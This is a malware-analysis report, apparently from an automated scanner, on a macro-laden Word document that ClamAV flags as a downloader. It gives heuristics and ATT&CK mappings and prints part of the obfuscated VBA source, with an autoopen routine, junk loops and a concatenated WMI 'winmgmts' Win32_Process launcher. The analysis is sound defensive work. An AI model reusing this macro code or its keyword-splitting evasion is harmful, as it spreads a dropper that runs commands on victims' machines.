MALICIOUS
342
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1137.001 DLL Search Order Hijacking
T1059 Command and Scripting Interpreter
The sample contains VBA macros with an autoopen function, indicating it is designed to execute automatically upon opening. Critical heuristics indicate the use of WMI (Win32_Process.Create) and obfuscated API calls like 'winmgmts', suggesting the macro's purpose is to launch external processes. This is consistent with a downloader or dropper malware.
Heuristics 9
-
ClamAV: Doc.Downloader.Smpowloadbb-6965298-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Smpowloadbb-6965298-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7481 bytes |
SHA-256: 3a94cea38ac5832469e3f3ff172f0d0192b144374d0cbf928a1090c20acd0c28 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "k81796"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "X_1667_4"
Attribute VB_Base = "0{A1E87136-6F6B-4B31-812F-75C8CB5D59ED}{5AC2E1ED-CF8A-4FA7-A059-6A1550D113CA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "a0146718"
Attribute VB_Name = "w6579506"
Attribute VB_Name = "Y10483"
Attribute VB_Name = "v0402_8"
Attribute VB_Base = "0{62271D62-2103-4E25-A76B-0E8D05BAE4FE}{07B30E92-0078-420E-88F7-EC430DD2DC45}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "d9813111"
Function F765808(z448983)
While A77125 And u3720840
'u4436999X9602373A_3646X20045
'C9103528p91712s_19_1O2175153
'F6079722F0284166r19721n8495311
Wend
While i8897_4 And t_1_2249
'i4368296f272427f498264i72334
'U31795L8407_7l4082_4z165_48
'P000011_O77_8061O487369n1353366
Wend
Set F765808 = CVar(z448983)
While Q5033_11 And X3_352
'M9242211h7_9209P5932860J6_163
'A393216Q81163O56_78o91865
'Q9_31399G293840r07576N699035
Wend
While c7_5032 And d45411
'i_0158R45_46i596627I6109479
'w47207z848230O886533S27_03
'C4_4_0i075591N2477150K__015
Wend
While I6583_2 And q3823_43
'i80_92_1F5798664n_786_83i10090
'i640609w586157D3606905i9_031
'V069024a9773910m_7118t_756312
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While P1_5_150 And l8017977
'd74079a854255G76293D69805
'n488293T7557674A2205_8U98370
'm7_457i196135o4864963K849635
Wend
While F02275 And D92_83
'q2267054J_978792n333058j529723_
'O5039226b3616_r8223635J66865
'w15290N6_148F77234H_4_708
Wend
While j565939 And u181_03
'Q6667_f8631157P47568E32217
'V00297i2120_q6_370_T0_7670
'f79_6917h942194i76_1758G638158
Wend
Call X175321
While p212509 And j0707_5
'w7__0_90M44800_A503_4_4Q474373
'O1569444n_7778Q_8_88F7111852
'i02_8_71k9_7070R59__3P22766
Wend
While M79941_ And R_2609
'i68651z9230175s09_51a_9615
'K21_06P4954448u_67175V_58959
'S864698j12718v771679w08116
Wend
While V243__ And F278_24
'A46694N9906124S396076E_4_9157
'p7036834E6459_4W_197_9A9151799
'O08395i029902o0338854h597153
Wend
End Sub
Attribute VB_Name = "j45_4318"
Function X175321()
On Error Resume Next
While s660676 And A2670_68
'h_22_065O8102340T283572X1507288
'B135684b787305w95986u06857_3
'J936266o52_28f3348079u219406
Wend
While z084_956 And B575833
'd7308_17B2335_5V387160D863709
'A_5_38_5L353_989G40366p65632
'D6_178b47576t28823d07_5914
Wend
While J658423_ And E76__75
'r495749i4674_6z031753o5277779
'D956484Z4662_H994305S_9__66
't75_4302M_18236E0_16044a91541
Wend
r1577825 = X_1667_4.Y168_96.PasswordChar + v0402_8.Q3_285 + X_1667_4.Y168_96 + v0402_8.Q7_611 + X_1667_4.Y168_96 + X_1667_4.Y168_96.PasswordChar + v0402_8.V68210 + X_1667_4.Y168_96.ControlTipText + X_1667_4.Y168_96.PasswordChar + v0402_8.r75_25 + X_1667_4.Y168_96.ControlTipText + v0402_8.a2_901_ + X_1667_4.Y168_96.ControlTipText
While j57648_ And X43140
'L461767M429350_p4198490V5361_
'a___84X53_52_O26090i60179
'j551078s4889464o4492402f07_498
Wend
While Q13675 And w7188363
'T27338_f9802361z83964U4_0920
'b107785N9_523F9251_c719_7
'u1_465N6146_38A2__629E58180
Wend
While E323275 And q4188541
'N99856a74235o30_98_C5809687
'j469913f8182382Y799_4Y918619
'P52_69F196724o107667J0_2_032
Wend
Set b2547_83 = F765808(GetObject("winmg" + "mts:
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.